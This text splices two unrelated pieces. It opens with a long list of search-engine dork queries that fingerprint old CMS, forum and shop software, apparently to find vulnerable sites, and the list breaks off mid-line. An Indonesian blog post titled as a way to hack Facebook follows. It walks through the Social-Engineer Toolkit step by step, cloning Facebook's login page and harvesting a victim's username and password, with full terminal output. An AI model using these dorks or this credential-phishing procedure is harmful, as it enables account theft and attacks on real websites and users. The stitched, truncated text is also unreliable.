"""This site is powered by CMS Made Simple version 1.2.2"""
"""This site is powered by CMS Made Simple"""
"""This site is powered by e107"""
"""This site is powered by e107""|inurl:e107_plugins|e107_handlers|e107_files"
"""This web site was made with MD-Pro"""
"""This web site was made with PostNuke"""
"""This website engine code is copyright"" ""2005 by Clever Copy"" -inurl:demo"
"""This website is powered by Mobius"""
"""This website is powered by Trio"""
"""This website powered by PHPX"" -demo"
"""This website was created with phpWebThings 1.4"""
"""This website was created with phpWebThings"""
"""TinyBB 2011 all rights reserved"""
"""Torbstoff News 4"""
"""Transloader by Somik.org"" OR ""Transloader by"" OR ""Transloder"""
"""Upload unique IP List:"" AND ""The Ultimate Fake Hit Generator - BOOST YOUR ALEXA RANK"" "
"""Uploader by CeleronDude."" "
"""Vivid Ads Shopping Cart"""
"""Web Group Communication Center beta 0.5.6"" OR ""Web Group Communication Center beta 0.5.5"""
"""Web Group Communication Center"""
"""Web Site Design by Red Cat Studios"""
"""Web site engine's code is copyright © 2001-2007 ATutor®"""
"""WebCalendar v1.0.4"""
"""Webdesign Cosmos Solutions"""
"""Website Design by Rocktime"""
"""Website Powered By Creative SplashWorks - SplashSite"" "
"""Website by Spokane Web Communications""  "
"""Website by WebSolutions.ca"""
"""Website powered by Subdreamer CMS & Sequel Theme Designed by indiqo.media"" "
"""Welcome to Exponent CMS"" | ""my new exponent site""  inurl:articlemodule "
"""Welcome to Exponent CMS"" | ""my new exponent site"""
"""Welcome to the versatileBulletinBoard"" | ""Powered by versatileBulletinBoard"""
"""X-CART. Powerful PHP shopping cart software"""
"""Yogurt build"""
"""You have not provided a survey identification num"
"""You have not provided a survey identification number"""
"""advanced_search_results.php?gender="""
"""and Powered By :Sansak"""
"""by Pivot - 1.40.5""  +'Dreadwind' -pivotlog.net"
"""by eXtreme Crew"""
"""by in-link""  or  ""Powered by In-Link 2."""
"""cms SunLight 5.2"""
"""com_joom12pic"""
"""com_joomlaflashfun"""
"""com_lmo"""
"""copyright 2006 Broadband Mechanics"""
"""delete entries"" inurl:admin/delete.asp"
"""download this free gallery at matteobinda.com"""
"""driven by: ASP Message Board"""
"""eCommerce Engine © 2006 xt:Commerce Shopsoftware"" "
"""error_log"" inurl:/wp-content"
"""generated by Exhibit Engine 1.5 RC 4"""
"""hlstats.php?mode=dailyawardinfo&award="" hlstatsx "
"""inc_webblogmanager.asp"""
"""index of"" intext:fckeditor inurl:fckeditor"
"""index.php?id_menu="" CMScontrol   "
"""index.php?option=com_chronoconnectivity"" / ""com_chronoconnectivity"
"""index.php?option=com_chronocontact"" / ""com_chronocontact"""
"""index.php?option=com_expose"" "
"""index.php?option=com_mdigg"""
"""index.php?option=com_news_portal"" or ""Powered by iJoomla News Portal"""
"""index.php?option=com_qcontacts"""
"""index.php?option=com_resman"""
"""index.php?option=com_rwcards"""
"""index.php?option=com_sef"" / ""com_sef"" "
"""index.php?option=com_seyret"" / ""com_seyret"""
"""index.php?sbjoke_id="""
"""index.php?section=post_upload""  "
"""intext:Warning: passthru()"" ""inurl:view=help"" "
"""inurl:/admin/"" ""ImageVue"" "
"""inurl:/site/articles.asp?idcategory="""
"""inurl:cultbooking.php"""
"""is a product of Lussumo"""
"""is proudly powered by WordPress"""
"""kims Q - Administrator Login Mode"""
"""made visual by sightFACTORY"""
"""mirco blogging"""
"""mumbo jumbo media"" + inurl:""index.php"""
"""nukeai beta3"""
"""pForum 1.29a""  OR """"Powie's PSCRIPT Forum 1.26"""
"""pForum 1.30"""
"""pages.php?page_ID="" ""K9 Kreativity"" "
"""php-addressbook"""
"""phpQuestionnaire v3"""
"""portailphp v1.3"" inurl:""index.php?affiche"" inurl:""PortailPHP"" -site:safari-msi.com"
"""powered by 4images"""
"""powered by AMCMS3"""
"""powered by Albinator"""
"""powered by AllMyGuests"""
"""powered by Blog System"" "
"""powered by Blue Dove Web Design"""
"""powered by CMS Made Simple version 1.1.2"""
"""powered by CubeCart 2.0"""
"""powered by CubeCart"" inurl:""index.php?_a="" "
"""powered by DBHcms"" "
"""powered by DreamAccount 3.1"""
"""powered by EQdkp"""
"""powered by ExtCalendar v2"""
"""powered by FlatPress"""
"""powered by Gallery v"" ""[slideshow]""|""images"" inurl:gallery"
"""powered by Gradman"""
"""powered by GuppY v4""|""Site créé avec GuppY v4"""
"""powered by ILIAS"""
"""powered by ITWorking"""
"""powered by JAMM"""
"""powered by LionWiki "" "
"""powered by MODx"""
"""powered by Nabernet"" "
"""powered by PCPIN.com"""
"""powered by Pagetool"""
"""powered by PassWiki"""
"""powered by Photo-Graffix Flash Image Gallery"""
"""powered by PhpBB 2.0.15"" -site:phpbb.com"
"""powered by Quick.Cart"""
"""powered by Sitellite"""
"""powered by Sniggabo CMS"" inurl:article.php?id"
"""powered by SnoGrafx"" "
"""powered by TSEP - The Search Engine Project"""
"""powered by ThWboard"""
"""powered by WonderEdit Pro"""
"""powered by XHP CMS"""
"""powered by active php bookmarks"" | inurl:bookmarks/view_group.php?id="
"""powered by aflog"""
"""powered by antiboard"""
"""powered by bitweaver"""
"""powered by blur6ex"""
"""powered by claroline"" -demo"
"""powered by clipshare"""
"""powered by dataface"" ""powered by xataface"" "
"""powered by devalcms v1.4.a"""
"""powered by discuz!"
"""powered by easytrade"""
"""powered by ezUserManager"""
"""powered by fuzzylime"" "
"""powered by gcards"""
"""powered by gelato cms"""
"""powered by guestbook script"" -ihackstuff -exploit"
"""powered by guestbook script"""
"""powered by jaws"" | ""powered by the jaws project"" | inurl:?gadget=search"
"""powered by jmdcms.com"""
"""powered by jshop"" "
"""powered by kure"""
"""powered by mcGalleryPRO"""
"""powered by minibb forum software"""
"""powered by minibb"" -site:www.minibb.net -intext:1.7f"
"""powered by php advanced transfer manager"""
"""powered by php icalendar"" -ihackstuff -exploit"
"""powered by php photo album"" -demo2 -pitanje"""
"""powered by php photo album"" | inurl:""main.php?cmd=album"" -demo2 -pitanje"
"""powered by php update"""
"""powered by phpAdBoard"""
"""powered by phpEmployment"""
"""powered by phpGreetCards"""
"""powered by phplist"" | inurl:""lists/?p=subscribe"" | inurl:""lists/index.php?p=subscribe"" -ubbi -bugs +phplist -tincan.co.uk"
"""powered by phpmydirectory"" OR intext:""2001-2006 phpMyDirectory.com"""
"""powered by pppblog v 0.3.(.)"""
"""powered by real-estate-website"""
"""powered by runcms"" -runcms.com -runcms.org"
"""powered by sX-Shop"" "
"""powered by sazcart"""
"""powered by sblog"" +""version 0.7"""
"""powered by seditio"" OR ""powered by ldu"""
"""powered by shutter v0.1.1"""
"""powered by simpleview CMS"""
"""powered by sphider"" -exploit -ihackstuff -www.cs.ioc.ee"
"""powered by sunshop"""
"""powered by tikiwiki"""
"""powered by twg"""
"""powered by ubbthreads"""
"""powered by vsp stats processor"""
"""powered by webClassifieds"""
"""powered by xmb"""
"""powered by yourtube"""
"""powered by zipbox media"""
"""powered by zomplog"""
"""powered by: WebLeague"" "
"""powered by: elkagroup"" "
"""powered by: profitCode"""
"""powergap"" or ""s04.php"" or s01.php or s02.php"
"""propulsé par JBlog"""
"""propulsé par DotClear"" ""fil atom"" ""fil rss"" +commentaires"
"""qjForum"""
"""realizacja eCreo.eu"""
"""running: Nucleus v3.1"" -.nucleuscms.org -demo"
"""script by RECIPE SCRIPT"""
"""site by Designscope"""
"""site powered by intuitive-websites.com"""
"""sitio web diseñado por www.toronja.com.pe"""
"""software 2004-2005 by randshop"""
"""this site is using the webspell script (version: 4.01.02)"""
"""toendaCMS is Free Software released under the GNU/GPL License."" | ""powered by toendaCMS"" -inurl:demo"
"""txx cms"""
"""visiteurs v2.0"""
"""wow roster version 1.*"""
"""wow roster version 1.5.*"""
"""© 2004 PHPKick.de Version 0.8"" "
"""© 2008 DevWorx - devworx.somee.com""  "
"""© 2009 Azimut Technologie"" "
"""© Sabdrimer CMS"""
"""© 2005-2006 Powered by eSyndiCat Link Exchange Script"""
"(""Skin Design by Amie of Intense"")|(""Fanfiction Categories"" ""Featured Stories"")|(""default2, 3column, Romance, eFiction"")"
"(""This Dragonflyâ„¢ installation was"" | ""Thanks for downloading Dragonfly"") -inurl:demo -inurl:cpgnuke.com"
"(""powered by nocc"" intitle:""NOCC Webmail"") -site:sourceforge.net -Zoekinalles.nl -analysis"
"(intitle:""Flyspray setup""|""powered by flyspray 0.9.7"") -flyspray.rocks.cc"
"(intitle:""metaframe XP Login"")|(intitle:""metaframe Presentation server Login"")"
"+""Powered by Invision Power Board v2.0.0..2"""
"+""Powered by phpBB 2.0.6..10"" -phpbb.com -phpbb.pl"
"+intext:""powered by MyBulletinBoard"""
"724CMS Powered, 724CMS Version 4.59. Enterprise "
"AlstraSoft Web ""ESE"""
"Copyright . Nucleus CMS v3.22 . Valid XHTML 1.0 Strict . Valid CSS . Back to top -demo -""deadly eyes"""
"Copyright 2007, PHPAUCTION.NET"
"Créé par Narfight, ClanLite V2.2006.05.20 © 2000-2005"
"FhImage, powered by Flash-here.com"
"Nwahy.com 2.1 , inurl:'add-site.html'"
"Powered by ""vcart 3.3.2"""
"Powered by Ac4p.com Gallery v1.0 , Copyright© 2007 ac4p.com"
"Powered by Discuz! 1.0 © 2002, Crossday Studio of 11cn.org"
"Powered by Dodo, Bubo & Misty. Feed us!"
"This page was produced using SAM Broadcaster. © Copyright Spacial Audio Solutions, LLC 1999 - 2004."
"This site is powered by e107, which is released under the terms of the GNU GPL License."
"[ Copyright 2005-2006 phpDirectorySourceâ„¢, all rights reserved ]"
"allintext: ""This site is powered by IndexScript"""
"allintext:"" If you would like to contact us, our email address is"" traffic"
"allintext:""Browse Blogs by Category"""
"allintext:""Browse our directory of our members top sites or create your own for free!"""
"allintext:""Home Member Search Chat Room Forum Help/Support privac

Cara Hack Facebook Dengan Backtrack

HACKTIVIS NKRI



Cara ini saya dapatkan dari hacker Backtrack terpercaya Jadi coba aja deh 

Alat Tempurnya : 
- Backtrack 5 R3

1- open terminal

root@AhmedShamy:~# cd /pentest/exploits/set
root@AhmedShamy:/pentest/exploits/set# ./set

01011001011011110111010100100000011100
10011001010110000101101100011011000111
10010010000001101000011000010111011001
10010100100000011101000110111100100000
01101101011101010110001101101000001000
00011101000110100101101101011001010010
00000110111101101110001000000111100101
10111101110101011100100010000001101000
01100001011011100110010001110011001000
00001110100010110100101001001000000101
01000110100001100001011011100110101101
11001100100000011001100110111101110010
00100000011101010111001101101001011011
10011001110010000001110100011010000110
01010010000001010011011011110110001101
10100101100001011011000010110101000101
01101110011001110110100101101110011001
01011001010111001000100000010101000110
11110110111101101100011010110110100101
11010000100000001010100110100001110101
011001110111001100101010

[---] The Social-Engineer Toolkit (SET) [---] 
[---] Created by: David Kennedy (ReL1K) [---]
[---] Development Team: JR DePre (pr1me) [---]
[---] Development Team: Joey Furr (j0fer) [---]
[---] Development Team: Thomas Werth [---] 
[---] Development Team: Garland [---] 
[---] Version: 3.6 [---] 
[---] Codename: 'MMMMhhhhmmmmmmmmm' [---] 
[---] Report bugs: davek@trustedsec.com [---] 
[---] Follow me on Twitter: dave_rel1k [---] 
[---] Homepage: https://www.trustedsec.com/ [---] 

Welcome to the Social-Engineer Toolkit (SET). Your one 
stop shop for all of your social-engineering needs.. 

Join us on irc.freenode.net in channel #setoolkit 

The Social-Engineer Toolkit is a product of TrustedSec.

Visit: https://www.trustedsec.com/

Select from the menu:

1) Social-Engineering Attacks
2) Fast-Track Penetration Testing
3) Third Party Modules
4) Update the Metasploit Framework
5) Update the Social-Engineer Toolkit
6) Update SET configuration
7) Help, Credits, and About

99) Exit the Social-Engineer Toolkit

set> 1

.M"""bgd `7MM"""YMM MMP""MM""YMM 
,MI "Y MM `7 P' MM `7 
`MMb. MM d MM 
`YMMNq. MMmmMM MM 
. `MM MM Y , MM 
Mb dM MM ,M MM 
P"Ybmmd" .JMMmmmmMMM .JMML.

[---] The Social-Engineer Toolkit (SET) [---] 
[---] Created by: David Kennedy (ReL1K) [---]
[---] Development Team: JR DePre (pr1me) [---]
[---] Development Team: Joey Furr (j0fer) [---]
[---] Development Team: Thomas Werth [---]
[---] Development Team: Garland [---]
[---] Version: 3.6 [---]
[---] Codename: 'MMMMhhhhmmmmmmmmm' [---]
[---] Report bugs: davek@trustedsec.com [---]
[---] Follow me on Twitter: dave_rel1k [---]
[---] Homepage: https://www.trustedsec.com/ [---]

Welcome to the Social-Engineer Toolkit (SET). Your one
stop shop for all of your social-engineering needs..

Join us on irc.freenode.net in channel #setoolkit

The Social-Engineer Toolkit is a product of TrustedSec.

Visit: https://www.trustedsec.com/

Select from the menu:

1) Spear-Phishing Attack Vectors
2) Website Attack Vectors
3) Infectious Media Generator
4) Create a Payload and Listener
5) Mass Mailer Attack
6) Arduino-Based Attack Vector
7) SMS Spoofing Attack Vector
8) Wireless Access Point Attack Vector
9) QRCode Generator Attack Vector
10) Powershell Attack Vectors
11) Third Party Modules

99) Return back to the main menu.

set> 2

The Web Attack module is a unique way of utilizing multiple web-based attacks
in order to compromise the intended victim.

The Java Applet Attack method will spoof a Java Certificate and deliver a 
metasploit based payload. Uses a customized java applet created by Thomas
Werth to deliver the payload.

The Metasploit Browser Exploit method will utilize select Metasploit
browser exploits through an iframe and deliver a Metasploit payload.

The Credential Harvester method will utilize web cloning of a web-
site that has a username and password field and harvest all the 
information posted to the website.

The TabNabbing method will wait for a user to move to a different
tab, then refresh the page to something different.

The Man Left in the Middle Attack method was introduced by Kos and 
utilizes HTTP REFERER's in order to intercept fields and harvest 
data from them. You need to have an already vulnerable site and in-
corporate <script src="http://YOURIP/">. This could either be from a
compromised site or through XSS.

The Web-Jacking Attack method was introduced by white_sheep, Emgent 
and the Back|Track team. This method utilizes iframe replacements to 
make the highlighted URL link to appear legitimate however when clicked 
a window pops up then is replaced with the malicious link. You can edit
the link replacement settings in the set_config if its too slow/fast.

The Multi-Attack method will add a combination of attacks through the web attack
menu. For example you can utilize the Java Applet, Metasploit Browser,
Credential Harvester/Tabnabbing, and the Man Left in the Middle attack
all at once to see which is successful.

1) Java Applet Attack Method
2) Metasploit Browser Exploit Method
3) Credential Harvester Attack Method
4) Tabnabbing Attack Method
5) Man Left in the Middle Attack Method
6) Web Jacking Attack Method
7) Multi-Attack Web Method
8) Victim Web Profiler
9) Create or import a CodeSigning Certificate

99) Return to Main Menu

set:webattack>4

The first method will allow SET to import a list of pre-defined web 
applications that it can utilize within the attack.

The second method will completely clone a website of your choosing
and allow you to utilize the attack vectors within the completely
same web application you were attempting to clone.

The third method allows you to import your own website, note that you
should only have an index.html when using the import website
functionality.

1) Web Templates
2) Site Cloner
3) Custom Import

99) Return to Webattack Menu

set:webattack>2
[-] This option is used for what IP the server will POST to.
[-] If you're using an external IP, use your external IP for this
set:webattack> IP address for the POST back in Harvester/Tabnabbing:192.168.65.128
[-] SET supports both HTTP and HTTPS
[-] Example: http://www.thisisafakesite.com/
set:webattack> Enter the url to clone:http://www.facebook.com/

[*] Cloning the website: https://login.facebook.com/login.php 
[*] This could take a little bit... 

The best way to use this attack is if username and password form 
fields are available. Regardless, this captures all POSTs on a website. 
[!] I have read the above message.

Press <return> to continue
80

[*] Tabnabbing Attack Vector is Enabled...Victim needs to switch tabs. 
[*] Social-Engineer Toolkit Credential Harvester Attack 
[*] Credential Harvester is running on port 80 
[*] Information will be displayed to you as it arrives below: 
80
192.168.65.128 - - [09/Feb/2013 04:46:59] "GET / HTTP/1.1" 200 -
192.168.65.128 - - [09/Feb/2013 04:47:05] "GET /index2.html HTTP/1.1" 200 -
192.168.65.128 - - [09/Feb/2013 04:47:05] "GET /index2.html HTTP/1.1" 200 -
[*] WE GOT A HIT! Printing the output:
PARAM: lsd=AVp8mX8f 
PARAM: display= 
PARAM: legacy_return=1 
PARAM: return_session=0 
PARAM: trynum=1 
PARAM: charset_test=€,´,€,´,水,Д,Є 
PARAM: timezone=-120 
PARAM: lgnrnd=184623_HAT4 
PARAM: lgnjs=1360378026 
POSSIBLE USERNAME FIELD FOUND: email=shamy 
POSSIBLE PASSWORD FIELD FOUND: pass=123456 
PARAM: default_persistent=0 
[*] WHEN YOU'RE FINISHED, HIT CONTROL-C TO GENERATE A REPORT.
-----------------